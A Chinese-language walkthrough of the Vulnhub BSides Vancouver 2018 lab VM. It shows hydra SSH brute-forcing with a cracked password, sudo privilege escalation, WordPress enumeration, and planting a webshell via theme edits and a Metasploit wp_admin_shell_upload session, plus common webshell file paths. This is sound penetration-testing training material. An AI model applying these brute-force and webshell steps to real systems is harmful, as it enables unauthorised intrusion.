Vulnhub-靶机-BSides Vancouver: 2018 (Workshop)

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现,本次是直接根据靶机目标给出的地址进行测试

目标靶机的下载地址:https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/

 发现开放了3个端口,分别是21,22,80这3个端口,我们先尝试访问21端口看看

因为上述nmap的扫描结果已经探测出来可以匿名登陆,我直接使用匿名登陆的方式登陆成功并发现目录public,访问该目录看到文件users.txt.bk  ,下载下来查看文件发现有可能是用户名,而且根据这个文件的命名格式也可确定是用户名,那么可以根据目标开放了22端口,可以使用ssh尝试登陆这些用户名试试

for user in $(cat users.txt.bk); do ssh $user@192.168.5.138; done

 使用for循环尝试每个用户,发现只有anne是可以通过密码登陆,其他的用户均只能使用密钥登陆,那么我们尝试暴力破解密码试试

 hydra -l anne -P /usr/share/wordlists/rockyou.txt -f -e nsr -o bsides.txt -t 4 ssh://192.168.5.138

发现账户名和密码

[22][ssh] host: 192.168.5.138   login: anne   password: princess

这是关于hydra的参数解释:http://www.luxinzhi.com/safe/438.html

现在有了账户和密码那么我们就试试账户和密码使用ssh登陆看看

成功登陆,发现权限极大,可以通过sudo直接提权

使用sudo -i即可提权

---------------------------------------------------------------------------------------------------------------------------------------------------------------

另一种思路

访问web页面

尝试暴力猜解目录

dirb http://192.168.5.138

 gobuster dir -u http://192.168.5.138 -w /usr/share/dirb/wordlists/common.txt

 根据上述暴力破解目录发现的robots.txt文件,访问得到如下结果,这里在刚开始nmap扫描的结果也有体现

 得到目录/backup_wordpress 尝试访问得到如下结果:

确认是个WordPress,那么我们使用wpscan来专门扫描一下

发现存在两个用户名john和admin

 得到用户名和密码为:john / enigma

 登陆到目标web应用直接改主题模板为webshell代码

获得webshell

 也可以写入一句话拿shell方法是一样的

msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.5.138
rhost => 192.168.5.138
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /backup_wordpress
targeturi => /backup_wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username john
username => john
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password enigma
password => enigma
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

 拿到权限后,提权跟上面思路一样

常见的WordPress通过插件和主题获取webshell的路径

http://192.168.5.138/backup_wordpress/wp-content/plugins/akismet/akismet.php

http://192.168.5.138/backup_wordpress/wp-content/themes/twentysixteen/archive.php

http://192.168.5.138/backup_wordpress/wp-content/themes/twentysixteen/template-parts/content.php

迷茫的人生,需要不断努力,才能看清远方模糊的志向!
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/autopwn/p/13529264.html